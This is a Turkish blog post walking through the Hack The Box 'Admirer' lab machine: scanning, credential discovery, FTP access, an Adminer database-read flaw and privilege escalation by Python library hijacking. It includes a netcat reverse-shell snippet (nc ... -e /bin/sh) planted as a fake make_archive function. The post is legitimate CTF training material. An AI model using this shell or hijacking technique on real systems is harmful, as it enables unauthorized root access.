• Bilim
  • Teknoloji
  • Mühendislikler
  • Oturum aç
Mühendisbilir
  • Anasayfa
  • Etkinlikler
  • Mühendislikler
  • Eğitimler
    • Online Eğitimler
    • Udemy Eğitimleri
  • Kategoriler
    • Genel
    • Bilim
    • Uzay
    • Yazılım
    • Tasarım
    • Teknoloji
    • Otomotiv
    • Girişimcilik
    • Yapay Zeka
    • Siber Güvenlik
    • Savunma Sanayi
    • Üniversite Tercihleri
Sonuç yok
Tüm Sonuçları Görüntüle
REKLAM
  • Anasayfa
  • Etkinlikler
  • Mühendislikler
  • Eğitimler
    • Online Eğitimler
    • Udemy Eğitimleri
  • Kategoriler
    • Genel
    • Bilim
    • Uzay
    • Yazılım
    • Tasarım
    • Teknoloji
    • Otomotiv
    • Girişimcilik
    • Yapay Zeka
    • Siber Güvenlik
    • Savunma Sanayi
    • Üniversite Tercihleri
Sonuç yok
Tüm Sonuçları Görüntüle
MühendisBilir
Sonuç yok
Tüm Sonuçları Görüntüle

Hack The Box -Admirer MAKİNE ÇÖZÜMÜ

Saniye Nur Çintimur Saniye Nur Çintimur
Kasım 10, 2020
Okuma Zamanı: 6 dk.
0 0
2
Hack The Box -Admirer MAKİNE ÇÖZÜMÜ
FacebookTwitterLinkedin

Merhaba, hadi çözüme geçelim.

Önce

nmap -Pn -A -T4 -p- 10.10.10.187

Nmap nedir ?

 Nmap, güvenlik açığı taraması ve ağ keşfi için ücretsiz, açık kaynaklı bir araçtır. Ağ yöneticileri Nmap’i sistemlerinde hangi cihazların çalıştığını belirlemek, mevcut ana makineleri ve sundukları hizmetleri keşfetmek, açık bağlantı noktaları bulmak ve güvenlik risklerini tespit etmek için kullanırlar.

Adminer nedir ?

Adminer PHP ile yazılmış tam özellikli bir veritabanı yönetim aracıdır.

PhpMyAdmin, Adminer tersine hedef sunucuya dağıtmak için hazır, tek bir dosya oluşur. Adminer MySQL, PostgreSQL, SQLite, MS SQL ve Oracle için kullanılabilir.

 

nmap taramamdan sonra bir dizin taraması yaptım ve robots.txt yi ziyaret etmem gerektiğini burada da gördüm:

Gobuster nedir ?

Gobuster aslında kaba kuvvet uygulamak için kullanılan bir araçtır:

  • Web sitelerindeki Url ler i listeler (dizinler ve dosyalar).
  • DNS alt alanlarını listeler .

 

Bu çıkan sayfaları kontrol ettiğimizde

Güzel credits elde ettik.Şimdi önce credential kısmında ftp bağlantıları gördüğüm için ftp ile bağlanmayı deniyorum , isterseniz terminalden yapın, isterseniz rahat arayüzü olan filezilla kullanın

FileZilla nedir ?

FileZilla, özetle özgür, açık kaynak ve çoklu platform destekli bir FTP istemcisidir.

Filezilla ile ftp bağlantımı sağladım.

Html.tar.gz içinde bulduklarımı inceliyorum

Adminer.php yi ziyaret ettiğimde ise mysql girişi geliyor, şimdi yukarıda buldugum bilgileri girip bağlantı sağlıyorum.

Bu kodu buldugum yer https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Hala gerçek şifreyi bulamadık (ssh bağlantısı için) , onu arıyoruz.Ve bunu çalıştırdıgımızda çalıştır ve sonra dışa aktar dediğimizde

Gerçek pass değerine ulaştık ve artık ssh ile bağlanabiliriz

Şimdi yetki yükseltmeye çalışalım :

sudo -l

özetle sudo haklarımızı listelemeye yarar.

Şimdi normalde burada herhangi bir işlem için rakamı girdiğimizde hata veriyordu, session hatası root olmadıgımız için, yetki yükselterek bunu aşacagız

 

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

Bu dökümandan faydalanarak şu betiği tmp dizinine ekliyorum ,

Nano ile ekleyebilirsiniz :

import os

def make_archive(a, b, c):

    os.system(‘nc 10.10.15.140  4444 -e “/bin/sh”‘)

( ip kısmına kendi ip nizi yazınız )

(fakat 4444 dinlemede olsun )

En son 6 yazın ve nc ile bağlanın :

Etiketler: admineradmirerbashfilezillaftpgobusterhackhacktheboxhtblocalhostnetcatnmappythonshellsshsudo

Get real time update about this post categories directly on your device, subscribe now.

Abonlikten Çık
Saniye Nur Çintimur

Saniye Nur Çintimur

Adli Bilişim Mühendisi Siber Güvenlik Araştırmacısı, Bilgi Güvenliği Analisti ve Offensive Security ilgili https://www.hackthebox.eu/home/users/profile/240523 https://tryhackme.com/p/sny @HackTheBox @PriviaHub @TryHackMe @CTF

Son Paylaşımlar

Yapay Zeka ve Otomotiv

Yapay Zeka ve Otomotiv

Ocak 10, 2021
WEB SERVİS NEDİR?

WEB SERVİS NEDİR?

Ocak 9, 2021
Laboratuvarda Kullanılan Malzemeler

Laboratuvarda Kullanılan Malzemeler

Ocak 1, 2021
Aerodinamik Nedir? Arabalar İçin Neden Önemli?

Aerodinamik Nedir? Arabalar İçin Neden Önemli?

Aralık 26, 2020
EMG (Elektromiyografi) Nedir?

EMG (Elektromiyografi) Nedir?

Aralık 14, 2020

Online Mağaza Ürünleri

  • MühendisBilir Beyaz Tasarım Kupa Bardak ₺39,90 ₺24,90
MühendisBilir

Mühendisbilir ; tüm disiplinler arası mühendislere ve mühendislik okuyan öğrencilere web sitesi üzerinden faydalı bilgiler ve sosyal medya hesapları üzerinden de hem eğlendiren hem bilgilendiren içerikleri bir araya getirerek, alanında ilgili insanların bir araya gelerek kurduğu bilim, teknoloji ve mühendislik platformudur.

Kategoriler

  • Genel
  • Bilim
  • Uzay
  • Yazılım
  • Tasarım
  • Teknoloji
  • Otomotiv
  • Girişimcilik
  • Yapay Zeka
  • Siber Güvenlik
  • Savunma Sanayi
  • Eğitimler
  • Etkinlikler
  • Mühendislikler

Son Haberler

Yapay Zeka ve Otomotiv

Yapay Zeka ve Otomotiv

Ocak 10, 2021
WEB SERVİS NEDİR?

WEB SERVİS NEDİR?

Ocak 9, 2021
  • Hakkımızda
  • İletişim
  • Gizlilik Politikası

© 2021 Muhendis Bilir - Hosting Hizmeti Tarafından Sağlanmaktadır.

Sonuç yok
Tüm Sonuçları Görüntüle
  • Anasayfa
  • Etkinlikler
  • Mühendislikler
  • Eğitimler
    • Online Eğitimler
    • Udemy Eğitimleri
  • Kategoriler
    • Genel
    • Bilim
    • Uzay
    • Yazılım
    • Tasarım
    • Teknoloji
    • Otomotiv
    • Girişimcilik
    • Yapay Zeka
    • Siber Güvenlik
    • Savunma Sanayi
    • Üniversite Tercihleri
  • Online Mağaza

© 2021 Muhendis Bilir - Hosting Hizmeti Tarafından Sağlanmaktadır.

Tekrar hoşgeldiniz!

Hesaba giriş yap

Şifremi unuttum

Yeni hesap oluştur

Kayıt olmak için formu doldurun

Tüm Alanlar Zorunludur Oturum aç

Şifrenizi Geri Alın

Şifreyi sıfırlamak için ayrıntı girin

Oturum aç

Yeni Oynatma Listesi Ekle

Veri politikasındaki amaçlarla sınırlı ve mevzuata uygun şekilde çerez konumlandırmaktayız. Detaylar için Gizlilik Politika'mızı inceleyebilirsiniz. .